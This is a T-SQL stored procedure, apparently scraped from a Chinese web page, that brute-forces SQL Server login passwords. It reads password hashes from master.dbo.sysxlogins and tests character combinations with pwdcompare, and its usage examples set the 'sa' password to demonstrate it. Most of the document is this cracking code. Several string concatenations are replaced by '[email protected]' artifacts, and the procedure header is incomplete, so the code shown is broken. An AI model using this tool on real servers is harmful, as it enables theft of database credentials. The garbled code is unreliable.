if exists (select * from dbo.sysobjects where id = object_id(n'[dbo].[p_getpassword]') and objectproperty(id, n'isprocedure') = 1)
/*--窮舉法破解 sql server 用戶密碼
可以破解中文,特殊字符,字符+尾隨空格的密碼
為了方便顯示特殊字符的密碼,在顯示結果中,顯示了組成密碼的ascii
理論上可以破解任意位數的密碼
條件是你的電腦配置足夠,時間足夠
--鄒建 2004.08(引用請保留此信息)--*/
/*--調用示例
--測試特殊字符
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_getpassword
--測試帶空格的密碼
exec sp_password null,'a ','sa'
exec p_getpassword
--測試中文
exec sp_password null,'我 ','sa'
exec p_getpassword
--清除密碼
exec sp_password null,null,'sa'
--*/
create proc p_getpassword
@username sysname=null,--用戶名,如果不指定,則列出所有用戶
@pwdlen int=3--密碼破解的位數,默認只破解3位及以下的密碼
as
--生成要破解的密碼的用戶表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--生成臨時表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint pk_#t primary key(id)
--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密碼破解處理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解1位密碼
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='[email protected]+'
,pwd='[email protected]+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('[email protected]+',pwd.password,pwd.type)=1
')
--破解超過2位的密碼
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @[email protected]+1
,@[email protected]+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@[email protected]+',#t '+char(@l/26+97)+char(@l%26+97)
,@[email protected]+'+char(b.id'+cast(@l as varchar)+')'
,@[email protected]+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '[email protected]+' into #tt from '[email protected]+'
update pwd set jm=1,pwdstr='[email protected]+'
,pwd='[email protected]+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('[email protected]+',pwd.password,pwd.type)=1
')
end
--顯示破解的密碼
select 用戶名=name,密碼=pwdstr,密碼ascii=pwd
from #pwd
go
新聞熱點
疑難解答
